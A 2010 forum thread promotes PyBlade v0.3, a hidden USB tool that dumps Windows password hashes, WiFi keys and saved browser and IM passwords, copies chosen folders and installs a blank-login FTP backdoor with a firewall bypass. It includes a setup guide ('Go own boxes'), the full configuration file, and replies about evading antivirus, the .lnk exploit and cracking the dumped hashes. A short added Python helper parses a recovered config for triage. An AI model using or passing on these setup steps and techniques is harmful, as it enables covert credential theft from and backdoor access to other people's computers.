sablefoxx Posted August 11, 2010 (edited)

PyBlade v0.3

About: Some people have been asking for an updated switchblade to run on Vista/7 computers so I thought I'd throw something together. It's a work in progress, I'm also fairly new to Python so no making fun of my code :D Please download and report bugs or requested features!

Current Abilities:
-Gathers system info, running processes, and local IP settings
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)
-Keyboard Randomizer payload
-Landmine payload
-Emo Computer payload
-Rick Roll payload
-IE Homepage payload
-Save logs in .txt, .html, or .xml format
-U3 support via .u3p file
-Support for file slurping
-FTP backdoor installer (w/ XP Firewall bypass)

Planned Updates:
-Netcat backdoor installer
-AV Bypass / Evade
-Save all logs in .html / .xml format

Downloads:
PyBlade v0.3 ==> md5: a9b10c99eb2f2ecbabefb0f908a1e3bf
PyBlade Source Code v0.3 (Includes payloads' source code)
U3 Support (.u3p) *BETA*

*** Change Log ***

v0.1
-Gathers system info, running processes, and network connections
-Dumps SAM file, via pwdump
-Dumps saved WiFi keys
-Dumps IM passwords
-Dumps IE saved passwords
-Dumps IE history
-Dumps Firefox passwords
-Dumps Chrome passwords
-Easy to configure via conf file
-Auto prompts for UAC if enabled
-Works on 64-bit machines
-Completely hidden (other than UAC prompt)

v0.2
-Added Keyboard Randomizer payload
-Added Landmine payload
-Added Change IE homepage payload
-Added comments to code
-Changed sysinfo to collect local IP settings
-Added options to save logs as .txt, .html, or .xml
-Added U3 support
-Checks to see if Firefox is installed before dumping passwords

v0.3
-Added Emo Computer payload (harmless don't worry)
-Added Random Rick Roll payload
-Added support for file slurping
-Added icons for .exe's
-Added FTP Server backdoor
-Correctly sets file extensions when saving logs in .html/.xml
-Added ability to bypass XP Firewall, and hide exceptions from the GUI
-Added time stamps to log directories

*** Quick Setup Guide ***

Setup for Non-U3 Drives:
0. Obtain a USB drive, and put on a Glitch Mob album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of your USB drive
3. Edit blade.conf to do your bidding (see below)
4. Go own boxes

Setup for Unmodified U3 Drives:
0. Obtain a U3 USB drive, and put on an album
1. Download latest version of PyBlade
2. Extract then copy the contents of PyBlade.rar to the root of the flash partition on the U3 drive
3. Edit blade.conf to do your bidding (see below)
4. Download F_Bex.u3p (see above)
5. Open the U3 menu, click "Add Programs" and "Install from My Computer"
6. Select F_Bex.u3p, and set it to automatically run when the drive is inserted
7. Go own boxes

Configure Your Blade:
1. Open "blade.conf" in your favorite text editor (or notepad)
2. Enable/Disable programs by changing their execute value (Enable = 1). Here are the default settings for v0.3:

# --------------------------------
# SwitchBlade Configuration File
# --------------------------------
# Log File Type
# Possible values; text, html, xml
log=html
# System Dumps
sysinfo=1
pwdump=1
wifi=1
mspass=1
iepw=1
iehist=1
ffpw=1
chromepw=1
# Payloads
keyrand=0
landmine=0
rickroll=0
emo=0
# Change IE Homepage
iehome=0
iehome_url=http://google.com
# Backdoors
ftpme=0
# File Slurping
# Seperate multiple directories using;'s
slurp=0
slurp_dirs=C:\Files;C:\Files2

Note that lines starting with '#' are comments, and are ignored during execution. Do NOT comment out lines to disable programs, just set their execute value to 0.
3. Some lines contain strings:
logs= Change this to set how the log files are saved (.log, .html, .xml)
iehome_url= If the IE Homepage payload is enabled (iehome=1), this is the URL that the homepage will be set to.
slurp_dirs= This is a list of the directories you want copied onto your drive, you can list multiple directories by separating them with semicolons
4. To manually execute, run "bex.exe"

Payloads:
Keyboard Randomizer: This program randomizes all keyboard input while it's running (keyrand).
Landmine: Selects a key at random and forcefully turns off the computer when it's pressed (landmine).
Emo Computer: The computer becomes sad and pretends to delete all the files on the computer (emo).
FTPme: Installs an FTP server on the root of the C: drive with a blank username/password (ftpme).
Random Rick Roller: Will open up rick rolls at random time intervals (rickroll).

Note: All payloads are activated on reboot (except for FTPme).

Let me know if you find bugs, and come say hi on IRC!

Edited August 23, 2010 by sablefoxx
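For an analyst who finds one of these drives, here is an added triage helper (not part of PyBlade or of this post) that reads a recovered blade.conf and reports which dumps, payloads and backdoors were switched on and which directories it was set to copy. The key names, the '#' comment rule and the ';' separator come from the post above; grouping the keys into categories is this example's own assumption.

```python
# Triage helper for a recovered blade.conf (added example, not PyBlade's own code).
# Key names, the '#' comment rule and ';'-separated slurp_dirs follow the post above;
# grouping the keys into categories is this example's own assumption.

DUMP_KEYS = ("sysinfo", "pwdump", "wifi", "mspass", "iepw", "iehist", "ffpw", "chromepw")
PAYLOAD_KEYS = ("keyrand", "landmine", "rickroll", "emo", "iehome")
BACKDOOR_KEYS = ("ftpme",)

def parse_blade_conf(text):
    """Return {key: value} for each 'key=value' line; '#' lines and blanks are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue  # comments, blanks and junk lines never abort the triage
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip()
    return settings

def enabled(settings, keys):
    """Keys whose execute value is 1 (the post: Enable = 1, anything else is off)."""
    return [k for k in keys if settings.get(k, "0") == "1"]

def triage(text):
    """Summarise what a recovered config would have collected or run."""
    s = parse_blade_conf(text)
    report = {
        "log_format": s.get("log", "text"),
        "dumps": enabled(s, DUMP_KEYS),
        "payloads": enabled(s, PAYLOAD_KEYS),
        "backdoors": enabled(s, BACKDOOR_KEYS),
        "ie_homepage": s.get("iehome_url") if s.get("iehome") == "1" else None,
        "slurp_dirs": [],
    }
    if s.get("slurp") == "1":
        report["slurp_dirs"] = [d for d in s.get("slurp_dirs", "").split(";") if d]
    return report

# Constructed sample: a v0.3-style file with pwdump, the FTP backdoor and slurping on.
SAMPLE_CONF = """\
# Log File Type
log=xml
sysinfo=1
pwdump=1
ftpme=1
slurp=1
slurp_dirs=C:\\Files;C:\\Files2
"""

if __name__ == "__main__":
    print(triage(SAMPLE_CONF))
```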
okiwan Posted August 11, 2010
wow you weren't joking. you're the man! can't wait to try it out. THANKS!

sablefoxx Posted August 11, 2010 (Author, edited)
Whoops, forgot a file, you may want to re-download it. Also just found a couple of bugs, working on fixes.
Edit -- Fixed problems!
Edited September 24, 2010 by sablefoxx

Jen Posted August 11, 2010
I thought it stopped things from autorunning with .inf?

sablefoxx Posted August 11, 2010 (Author, edited)
> I thought it stopped things from autorunning with .inf?
It should still work on XP, I'm working on getting the new .lnk icon exploit to run it on unpatched Vista/Seven computers, and U3 support.
Edited August 11, 2010 by sablefoxx

m1k Posted August 11, 2010
Well done Batman !! ;)

Zimmer Posted August 11, 2010
Nice!

misfitsman805 Posted August 11, 2010
Nice! Keep up the good work man! Can't wait for future versions! XD

IrishFavor Posted August 13, 2010
so far looks great. thank you for all the work on this project.

m1k Posted August 14, 2010
It works on XP... any Vista/Seven reports?

xantos_gambit Posted August 16, 2010
Pretty cool, needs an AV killer or something, most AVs destroy it before it gets a chance to do anything useful.

sablefoxx Posted August 16, 2010 (Author, edited)
Updated to v0.2, added payloads, and some other small stuff.
> Pretty cool, needs an AV killer or something, most AVs destroy it before it gets a chance to do anything useful.
Hmm... I have yet to see this done well, perhaps I'll try something. I could easily add an encrypted .rar where the files in question could be stored until after the AV has been killed or disabled. "bex.exe" shouldn't be flagged (VirusTotal). The problem is that killing AV software isn't as simple as making a taskkill system call, but perhaps we can disable it or crash it (without crashing the OS). The problem with this method is that we can only target specific titles.
Edited August 17, 2010 by sablefoxx

Mr. Stuky Posted August 17, 2010
Sorry for my noobness, but can you make a tutorial on how to use these scripts? And how to make it work with a U3 FlashDrive. Thanks, and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman

sablefoxx Posted August 17, 2010 (Author)
> Sorry for my noobness, but can you make a tutorial on how to use these scripts? And how to make it work with a U3 FlashDrive. Thanks, and I do apologize for my ignorance on this awesome software. Thanks. Good Job Batman
I'll throw something together, brb.

Mr. Stuky Posted August 17, 2010
Thanks, really appreciated. Btw, added you so we can TF2 sometime. ;]

Jen Posted August 17, 2010
I noticed you removed the .lnk icon exploit from your planned features. Is it impossible to implement it?

sablefoxx Posted August 17, 2010 (Author)
> I noticed you removed the .lnk icon exploit from your planned features. Is it impossible to implement it?
More difficult than originally anticipated, may add it later.

m1k Posted August 17, 2010
Antivirus disabling.... also if my Avira doesn't see anything.... ;)

w1ldf1re Posted August 17, 2010
Awesome that you're now using Python! I've been doing a course in it at university and it's nice to be able to see what you're doing in your programs and to be able to fix any errors that I get. Hope I can contribute at some stage. :)

w1ldf1re Posted August 17, 2010 (edited)
(delete)
Edited August 17, 2010 by w1ldf1re

okiwan Posted August 17, 2010
Just tried it on a Vista machine. I had to disable AVG security cause it was being a pain. Everything seems to be working great. Didn't get any passwords though cause I guess the user didn't save them. I'm gonna have to try it on another computer. Is there any way it can get the Windows login password too?

sablefoxx Posted August 17, 2010 (Author)
> Just tried it on a Vista machine. I had to disable AVG security cause it was being a pain. Everything seems to be working great. Didn't get any passwords though cause I guess the user didn't save them. I'm gonna have to try it on another computer. Is there any way it can get the Windows login password too?
Yeap, the 'pwdump' log file contains the login password hashes, you'll need to crack them using a program like ophcrack.

Zimmer Posted August 17, 2010
sablefoxx, have you been able to find any implementation details on the .lnk exploit? From what I read it has something to do with the parsing of the picture on any shortcut with shell32.dll, but that is all I could find.

xantos_gambit Posted August 17, 2010
I have officially tried this on a win7 machine, it did the job. Haven't cracked the hash it gave me yet so we will see. Combine this with the pocket knife's file slurping and we have a good skiddie tool.

okiwan Posted August 17, 2010
> Yeap, the 'pwdump' log file contains the login password hashes, you'll need to crack them using a program like ophcrack.
This is what's in my pwdump log file. Is there something wrong here? Cause the machine does have a login password. I know the password but why won't it dump it? Or is this what it's supposed to look like and I have to crack it with that program?

Administrator:500:NO PASSWORD*********************:NO PASSWORD*********************:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
VM:1000:NO PASSWORD*********************:NO PASSWORD*********************:::